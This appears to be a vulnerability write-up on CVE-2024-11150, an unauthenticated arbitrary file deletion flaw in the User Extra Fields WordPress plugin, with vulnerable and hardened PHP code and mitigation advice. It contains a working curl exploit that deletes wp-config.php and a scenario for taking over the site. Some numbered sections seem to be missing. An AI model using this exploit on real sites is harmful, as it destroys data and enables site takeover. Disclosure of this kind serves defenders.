Summary:
CVE-2024-11150 is a critical vulnerability in the "User Extra Fields" WordPress plugin (versions up to and including 16.6). Due to poor validation in the delete_tmp_uploaded_file() function, an unauthenticated attacker can delete any file on the server. This can result in a full site compromise, especially if a key file like wp-config.php is removed.
1. What Is The User Extra Fields Plugin?
The User Extra Fields plugin lets WordPress site owners add custom user fields to registration and profile forms. It’s popular for sites with custom user management needs.
Link to plugin:
https://wordpress.org/plugins/user-extra-fields/
2. Vulnerability Details (CVE-2024-11150)
At the heart of the issue lies the delete_tmp_uploaded_file() function. It is supposed to delete *only* temporary uploaded files, but it doesn't strictly check the file path. As a result, attackers may specify any file path, leading the function to delete files outside the designated temp directory.
Vulnerability Type: Arbitrary File Deletion
Authentication Required: None (Unauthenticated)
Severity: Critical
Versions Affected: All up to 16.6
Key Problem
The function trusts user input about what file to delete.
Here’s a simplified version of the problematic code:
// Inside user-extra-fields/libs/ajax.php
function delete_tmp_uploaded_file() {
    $file = $_POST['file'];            // taken directly from the request
    if (file_exists($file)) {
        unlink($file);                 // deletes whatever path the caller named
        echo 'Deleted: ' . htmlspecialchars($file);
    }
    exit;
}
Notice that $file (supplied by the user) is neither sanitized nor checked against the directory the function is meant to operate in.
Attack Scenario
1. Attacker discovers endpoint (e.g., /wp-admin/admin-ajax.php?action=delete_tmp_uploaded_file).
2. Attacker crafts a POST request with the parameter file set to /var/www/html/wp-config.php (or equivalent).
3. The plugin runs unlink('/var/www/html/wp-config.php'), deleting the site’s config file.
Now, the next visitor triggers installation mode, allowing the attacker to take over the site or potentially upload their own code.
Example Exploit (cURL)
curl -X POST \
-d "action=delete_tmp_uploaded_file" \
-d "file=../../../../wp-config.php" \
https://victim-site.com/wp-admin/admin-ajax.php
Deleting critical files (like wp-config.php) puts WordPress in setup mode.
- The attacker can re-install WordPress, connect it to their own database, or upload a malicious plugin/theme.
6. References and Official Resources
- Wordfence Advisory & Details
- WPScan Entry: CVE-2024-11150
- Plugin page (WordPress.org)
- CVE Record
- Disable or remove the plugin until a patch is available.
- Prevent public access to /wp-admin/admin-ajax.php where possible.
A secure fix should only allow files within a specific directory:
// Inside user-extra-fields/libs/ajax.php (hardened version)
function delete_tmp_uploaded_file() {
    $file    = $_POST['file'];
    $tmp_dir = '/path/to/wp-content/uploads/user-extra-fields/tmp/';
    // realpath() resolves "..", "." and symlinks; it returns false when the path does not exist
    $realTmp  = realpath($tmp_dir);
    $realFile = realpath($file);
    // Require the resolved file to start with the temp dir plus a separator,
    // so a sibling directory such as ".../tmp2/" is not accepted as a prefix match
    $prefix = $realTmp . DIRECTORY_SEPARATOR;
    if ($realTmp !== false && $realFile !== false
        && strpos($realFile, $prefix) === 0
        && is_file($realFile)) {
        unlink($realFile);
        echo 'Deleted: ' . htmlspecialchars($realFile);
    }
    exit;
}
This makes sure only files inside the intended temp dir can be deleted.
8. Conclusion
CVE-2024-11150 is a perfect example of how neglecting input validation leads to critical security holes. Arbitrary file deletion can escalate to remote code execution and total site takeover. If you use the User Extra Fields plugin, disable it and update ASAP.
Stay safe!
If you found this writeup helpful, consider sharing it with others and keep your plugins updated.
Timeline
Published on: 11/13/2024 05:15:12 UTC
Last modified on: 11/13/2024 17:01:16 UTC